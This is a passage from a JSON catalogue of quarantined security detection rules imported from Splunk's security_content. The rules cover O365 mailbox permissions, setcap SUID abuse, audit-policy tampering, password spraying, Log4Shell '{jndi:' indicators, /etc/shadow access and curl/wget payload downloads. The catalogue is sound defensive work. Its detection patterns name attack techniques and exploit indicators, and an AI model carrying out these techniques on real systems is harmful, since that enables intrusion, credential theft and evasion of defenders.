If confirmed malicious, an attacker could gain unauthorized access to sensitive emails, leading to data breaches and compromising the confidentiality of organizational communications.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-mailbox-folder-read-permission-assigned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1435475e-2128-4417-a34f-59770733b0d5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_mailbox_folder_read_permission_assigned.yml" } }, { "id": "splunk-security-content-1474459a-302b-4255-8add-d82f96d14cd9", "type": "detection", "name": "Linux Auditd Setuid Using Setcap Utility", "description": "The following analytic detects the execution of the 'setcap' utility to enable the SUID bit on Linux systems. It leverages Linux Auditd data, focusing on process names and command-line arguments that indicate the use of 'setcap' with specific capabilities. This activity is significant because setting the SUID bit allows a user to temporarily gain root access, posing a substantial security risk. 
If confirmed malicious, an attacker could escalate privileges, execute arbitrary commands with elevated permissions, and potentially compromise the entire system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-setuid-using-setcap-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1474459a-302b-4255-8add-d82f96d14cd9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_setuid_using_setcap_utility.yml" } }, { "id": "splunk-security-content-1490f224-ad8b-11eb-8c4f-acde48001122", "type": "detection", "name": "Disable Windows App Hotkeys", "description": "The following analytic detects a suspicious registry modification aimed at disabling Windows hotkeys for native applications. It leverages data from the Endpoint.Registry data model, focusing on specific registry paths and values indicative of this behavior. This activity is significant as it can impair an analyst's ability to use essential tools like Task Manager and Command Prompt, hindering incident response efforts. 
If confirmed malicious, this technique can allow an attacker to maintain persistence and evade detection, complicating the remediation process.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disable-windows-app-hotkeys.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1490f224-ad8b-11eb-8c4f-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disable_windows_app_hotkeys.yml" } }, { "id": "splunk-security-content-14e008e5-6723-4298-b0d4-e95b24e10c18", "type": "detection", "name": "Windows Audit Policy Disabled via Auditpol", "description": "The following analytic identifies the execution of `auditpol.exe` with the \"/set\" command-line argument in order to disable a specific category or sub-category from the audit policy. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity can be significant as it indicates potential defense evasion by adversaries or Red Teams, aiming to limit data that can be leveraged for detections and audits. 
If confirmed malicious, this behavior could allow attackers to bypass defenses, and plan further attacks, potentially leading to full machine compromise or lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-audit-policy-disabled-via-auditpol.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "14e008e5-6723-4298-b0d4-e95b24e10c18", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_audit_policy_disabled_via_auditpol.yml" } }, { "id": "splunk-security-content-14e3a089-cc23-4f4d-a770-26e44a31fbac", "type": "detection", "name": "Windows BitLockerToGo with Network Activity", "description": "The following analytic detects suspicious usage of BitLockerToGo.exe, which has been observed being abused by Lumma stealer malware. The malware leverages this legitimate Windows utility to manipulate registry keys, search for cryptocurrency wallets and credentials, and exfiltrate sensitive data. This activity is significant because BitLockerToGo.exe provides functionality for viewing, copying, and writing files as well as modifying registry branches - capabilities that the Lumma stealer exploits for malicious purposes. If confirmed malicious, this could indicate an active data theft campaign targeting cryptocurrency wallets, browser credentials, and password manager archives. 
The detection focuses on identifying BitLockerToGo.exe execution patterns that deviate from normal system behavior.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-bitlockertogo-with-network-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "14e3a089-cc23-4f4d-a770-26e44a31fbac", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_bitlockertogo_with_network_activity.yml" } }, { "id": "splunk-security-content-14f414cf-3080-4b9b-aaf6-55a4ce947b93", "type": "detection", "name": "Windows Unusual Count Of Users Fail To Auth Wth ExplicitCredentials", "description": "The following analytic identifies a source user failing to authenticate with multiple users using explicit credentials on a host. It leverages Windows Event Code 4648 and calculates the standard deviation for each host, using the 3-sigma rule to detect anomalies. This behavior is significant as it may indicate a Password Spraying attack, where an adversary attempts to gain initial access or elevate privileges. 
If confirmed malicious, this activity could lead to unauthorized access, privilege escalation, or further compromise of the Active Directory environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unusual-count-of-users-fail-to-auth-wth-explicitcredentials.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "14f414cf-3080-4b9b-aaf6-55a4ce947b93", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unusual_count_of_users_fail_to_auth_wth_explicitcredentials.yml" } }, { "id": "splunk-security-content-1522145a-8e86-4f83-89a8-baf62a8f489d", "type": "detection", "name": "Windows Modify Registry on Smart Card Group Policy", "description": "This analytic is developed to detect suspicious registry modifications targeting the \"scforceoption\" key. Altering this key enforces smart card login for all users, potentially disrupting normal access methods. 
Unauthorized changes to this setting could indicate an attempt to restrict access or force a specific authentication method, possibly signifying malicious intent to manipulate system security protocols.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-on-smart-card-group-policy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1522145a-8e86-4f83-89a8-baf62a8f489d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_on_smart_card_group_policy.yml" } }, { "id": "splunk-security-content-15603165-147d-4a6e-9778-bd0ff39e668f", "type": "detection", "name": "Windows Unusual Count Of Invalid Users Failed To Auth Using NTLM", "description": "The following analytic identifies a source endpoint failing to authenticate with multiple invalid users using the NTLM protocol. It leverages EventCode 4776 and calculates the standard deviation for each host, using the 3-sigma rule to detect anomalies. This behavior is significant as it may indicate a Password Spraying attack, where an adversary attempts to gain initial access or elevate privileges. If confirmed malicious, this activity could lead to unauthorized access or privilege escalation, posing a significant threat to the Active Directory environment. 
This detection is focused on domain controllers.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unusual-count-of-invalid-users-failed-to-auth-using-ntlm.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "15603165-147d-4a6e-9778-bd0ff39e668f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unusual_count_of_invalid_users_failed_to_auth_using_ntlm.yml" } }, { "id": "splunk-security-content-15838756-f425-43fa-9d88-a7f88063e81a", "type": "detection", "name": "Access to Vulnerable Ivanti Connect Secure Bookmark Endpoint", "description": "The following analytic identifies access to the /api/v1/configuration/users/user-roles/user-role/rest-userrole1/web/web-bookmarks/bookmark endpoint, which is associated with CVE-2023-46805 and CVE-2024-21887 vulnerabilities. It detects this activity by monitoring for GET requests that receive a 403 Forbidden response with an empty body. This behavior is significant as it indicates potential exploitation attempts against Ivanti Connect Secure systems. 
If confirmed malicious, attackers could exploit these vulnerabilities to gain unauthorized access or control over the affected systems, leading to potential data breaches or system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/access-to-vulnerable-ivanti-connect-secure-bookmark-endpoint.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "15838756-f425-43fa-9d88-a7f88063e81a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/access_to_vulnerable_ivanti_connect_secure_bookmark_endpoint.yml" } }, { "id": "splunk-security-content-158b68fa-5d1a-11ec-aac8-acde48001122", "type": "detection", "name": "Hunting for Log4Shell", "description": "The following analytic detects potential exploitation attempts of the Log4Shell vulnerability (CVE-2021-44228) by analyzing HTTP headers for specific patterns. It leverages the Web Datamodel and evaluates various indicators such as the presence of `{jndi:`, environment variables, and common URI paths. This detection is significant as Log4Shell allows remote code execution, posing a severe threat to systems. 
If confirmed malicious, attackers could gain unauthorized access, execute arbitrary code, and potentially compromise sensitive data, leading to extensive damage and data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/hunting-for-log4shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "158b68fa-5d1a-11ec-aac8-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/hunting_for_log4shell.yml" } }, { "id": "splunk-security-content-15b0694e-caa2-4009-8d83-a1f98b86d086", "type": "detection", "name": "PingID Mismatch Auth Source and Verification Response", "description": "The following analytic identifies discrepancies between the IP address of an authentication event and the IP address of the verification response event, focusing on differences in the originating countries. It leverages JSON logs from PingID, comparing the 'auth_Country' and 'verify_Country' fields. This activity is significant as it may indicate suspicious sign-in behavior, such as account compromise or unauthorized access attempts. 
If confirmed malicious, this could allow attackers to bypass authentication mechanisms, potentially leading to unauthorized access to sensitive systems and data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1621", "T1556.006", "T1098.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/pingid-mismatch-auth-source-and-verification-response.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "15b0694e-caa2-4009-8d83-a1f98b86d086", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/pingid_mismatch_auth_source_and_verification_response.yml" } }, { "id": "splunk-security-content-15d905f6-da6b-11eb-ab82-acde48001122", "type": "detection", "name": "Spoolsv Spawning Rundll32", "description": "The following analytic detects the spawning of `rundll32.exe` without command-line arguments by `spoolsv.exe`, which is unusual and potentially indicative of exploitation attempts like CVE-2021-34527 (PrintNightmare). This detection leverages Endpoint Detection and Response (EDR) telemetry, focusing on process creation events where `spoolsv.exe` is the parent process. This activity is significant as `spoolsv.exe` typically does not spawn other processes, and such behavior could indicate an active exploitation attempt. 
If confirmed malicious, this could allow an attacker to execute arbitrary code, escalate privileges, or maintain persistence on the compromised endpoint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/spoolsv-spawning-rundll32.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "15d905f6-da6b-11eb-ab82-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/spoolsv_spawning_rundll32.yml" } }, { "id": "splunk-security-content-15e70689-f55b-489e-8a80-6d0cd6d8aad2", "type": "detection", "name": "Windows Deleted Registry By A Non Critical Process File Path", "description": "The following analytic detects the deletion of registry keys by non-critical processes. It leverages Endpoint Detection and Response (EDR) data, focusing on registry deletion events and correlating them with processes not typically associated with system or program files. This activity is significant as it may indicate malware, such as the Double Zero wiper, attempting to evade defenses or cause destructive payload impacts. 
If confirmed malicious, this behavior could lead to significant system damage, loss of critical configurations, and potential disruption of services.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-deleted-registry-by-a-non-critical-process-file-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "15e70689-f55b-489e-8a80-6d0cd6d8aad2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_deleted_registry_by_a_non_critical_process_file_path.yml" } }, { "id": "splunk-security-content-15e79d0a-c659-42fd-9668-94108528f2ec", "type": "detection", "name": "ESXi Shell Access Enabled", "description": "This detection identifies when the ESXi Shell is enabled on a host, which may indicate that a malicious actor is preparing to execute commands locally or establish persistent access. 
Enabling the shell outside of approved maintenance windows can be a sign of compromise or unauthorized administrative activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-shell-access-enabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "15e79d0a-c659-42fd-9668-94108528f2ec", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_shell_access_enabled.yml" } }, { "id": "splunk-security-content-1606cc5b-fd5f-4865-9fe3-0ed1eaec2df6", "type": "detection", "name": "HTTP Duplicated Header", "description": "Detects when a request has more than one of the same header. This is commonly used in request smuggling and other web based attacks. HTTP Request Smuggling exploits inconsistencies in how front-end and back-end servers parse HTTP requests by using ambiguous or malformed headers to hide malicious requests within legitimate ones. Attackers leverage duplicate headers, particularly Content-Length and Transfer-Encoding, to cause different servers in the chain to disagree on where one request ends and another begins. 
RFC7230 states that a sender MUST NOT generate multiple header fields with the same field name in a message unless either the entire field value for that header field is defined as a comma-separated list or the header field is a well-known exception.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001", "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/http-duplicated-header.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1606cc5b-fd5f-4865-9fe3-0ed1eaec2df6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/http_duplicated_header.yml" } }, { "id": "splunk-security-content-16107e0e-71fc-11ec-b862-acde48001122", "type": "detection", "name": "Linux Possible Access To Credential Files", "description": "The following analytic detects attempts to access or dump the contents of /etc/passwd and /etc/shadow files on Linux systems. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on processes like 'cat', 'nano', 'vim', and 'vi' accessing these files. This activity is significant as it may indicate credential dumping, a technique used by adversaries to gain persistence or escalate privileges. 
If confirmed malicious, attackers could obtain hashed passwords for offline cracking, leading to unauthorized access and potential system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-possible-access-to-credential-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "16107e0e-71fc-11ec-b862-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_possible_access_to_credential_files.yml" } }, { "id": "splunk-security-content-16132445-da9f-4d03-ad44-56d717dcd67d", "type": "detection", "name": "Windows AD Self DACL Assignment", "description": "Detect when a user creates a new DACL in AD for their own AD object.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1484", "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-self-dacl-assignment.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "16132445-da9f-4d03-ad44-56d717dcd67d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", 
"upstream_path": "detections/endpoint/windows_ad_self_dacl_assignment.yml" } }, { "id": "splunk-security-content-161bc0ca-4651-4c13-9c27-27770660cf67", "type": "detection", "name": "Risk Rule for Dev Sec Ops by Repository", "description": "The following analytic identifies high-risk activities within repositories by correlating repository data with risk scores. It leverages findings and intermediate findings created by detections from the Dev Sec Ops analytic stories, summing risk scores and capturing source and user information. The detection focuses on high-risk scores above 100 and sources with more than three occurrences. This activity is significant as it highlights repositories frequently targeted by threats, providing insights into potential vulnerabilities. If confirmed malicious, attackers could exploit these repositories, leading to data breaches or infrastructure compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/risk-rule-for-dev-sec-ops-by-repository.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "161bc0ca-4651-4c13-9c27-27770660cf67", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/risk_rule_for_dev_sec_ops_by_repository.yml" } }, { "id": "splunk-security-content-1631ac2d-f2a9-42fa-8a59-d6e210d472f5", "type": "detection", "name": "Windows Findstr GPP Discovery", "description": "The following analytic detects the use of the findstr command to search for unsecured credentials 
in Group Policy Preferences (GPP). It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions involving findstr.exe with references to SYSVOL and cpassword. This activity is significant because it indicates an attempt to locate and potentially decrypt embedded credentials in GPP, which could lead to unauthorized access. If confirmed malicious, this could allow an attacker to escalate privileges or gain access to sensitive systems and data within the domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-findstr-gpp-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1631ac2d-f2a9-42fa-8a59-d6e210d472f5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_findstr_gpp_discovery.yml" } }, { "id": "splunk-security-content-1668812a-6047-11eb-ae93-0242ac130002", "type": "detection", "name": "O365 Added Service Principal", "description": "The following analytic detects the addition of new service principal accounts in O365 tenants. It leverages data from the `o365_management_activity` dataset, specifically monitoring for operations related to adding or creating service principals. This activity is significant because attackers can exploit service principals to gain unauthorized access and perform malicious actions within an organization's environment. 
If confirmed malicious, this could allow attackers to interact with APIs, access resources, and execute operations on behalf of the organization, potentially leading to data breaches or further compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-added-service-principal.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1668812a-6047-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_added_service_principal.yml" } }, { "id": "splunk-security-content-16ae9076-d1d5-411c-8fdd-457504b33dac", "type": "detection", "name": "ASL AWS Detect Users creating keys with encrypt policy without MFA", "description": "The following analytic detects the creation of AWS KMS keys with an encryption policy accessible to everyone, including external entities. It leverages AWS CloudTrail logs from Amazon Security Lake to identify `CreateKey` or `PutKeyPolicy` events where the `kms:Encrypt` action is granted to all principals. This activity is significant as it may indicate a compromised account, allowing an attacker to misuse the encryption key to target other organizations. 
If confirmed malicious, this could lead to unauthorized data encryption, potentially disrupting operations and compromising sensitive information across multiple entities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1486" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-detect-users-creating-keys-with-encrypt-policy-without-mfa.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "16ae9076-d1d5-411c-8fdd-457504b33dac", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_detect_users_creating_keys_with_encrypt_policy_without_mfa.yml" } }, { "id": "splunk-security-content-16eb11bc-ef42-42e8-9d0c-d21e0fa15725", "type": "detection", "name": "Windows New EventLog ChannelAccess Registry Value Set", "description": "The following analytic detects suspicious modifications to the EventLog security descriptor registry value for defense evasion. It leverages data from the Endpoint.Registry data model, focusing on changes to the \"CustomSD\" value within the \"HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Eventlog\\\\CustomSD\" path. This activity is significant as changes to the access permissions of the event log could blind security products and help attackers evade defenses. 
If confirmed malicious, this could allow attackers to block users and security products from viewing, ingesting and interacting event logs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-new-eventlog-channelaccess-registry-value-set.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "16eb11bc-ef42-42e8-9d0c-d21e0fa15725", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_new_eventlog_channelaccess_registry_value_set.yml" } }, { "id": "splunk-security-content-172c59f2-5fae-45e5-8e51-94445143e93f", "type": "detection", "name": "Citrix ShareFile Exploitation CVE-2023-24489", "description": "The following analytic detects potentially malicious file upload attempts to Citrix ShareFile via specific suspicious URLs and the HTTP POST method. It leverages the Web datamodel to identify URL patterns such as \"/documentum/upload.aspx?parentid=\", \"/documentum/upload.aspx?filename=\", and \"/documentum/upload.aspx?uploadId=*\", combined with the HTTP POST method. This activity is significant for a SOC as it may indicate an attempt to upload harmful scripts or content, potentially compromising the Documentum application. 
If confirmed malicious, this could lead to unauthorized access, data breaches, and operational disruptions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/citrix-sharefile-exploitation-cve-2023-24489.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "172c59f2-5fae-45e5-8e51-94445143e93f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/citrix_sharefile_exploitation_cve_2023_24489.yml" } }, { "id": "splunk-security-content-173a1cb9-1814-4128-a9dc-f29dade89957", "type": "detection", "name": "Cisco Secure Firewall - Wget or Curl Download", "description": "The following analytic detects outbound connections initiated by command-line tools such as curl or wget. It leverages Cisco Secure Firewall Threat Defense logs and identifies allowed connections (action=Allow) where either the EVE_Process or ClientApplication fields indicate use of these utilities. While curl and wget are legitimate tools commonly used for software updates and scripting, adversaries often abuse them to download payloads, retrieve additional tools, or establish staging infrastructure from compromised systems. 
If confirmed malicious, this behavior may indicate the download phase of an attack chain or a command-and-control utility retrieval.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.003", "T1059", "T1071.001", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-wget-or-curl-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "173a1cb9-1814-4128-a9dc-f29dade89957", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___wget_or_curl_download.yml" } }, { "id": "splunk-security-content-175bb2de-6227-416b-9678-9b61999cd21f", "type": "detection", "name": "Windows Enable PowerShell Web Access", "description": "The following analytic detects the enabling of PowerShell Web Access via PowerShell commands. It leverages PowerShell script block logging (EventCode 4104) to identify the execution of the `Install-WindowsFeature` cmdlet with the `WindowsPowerShellWebAccess` parameter. 
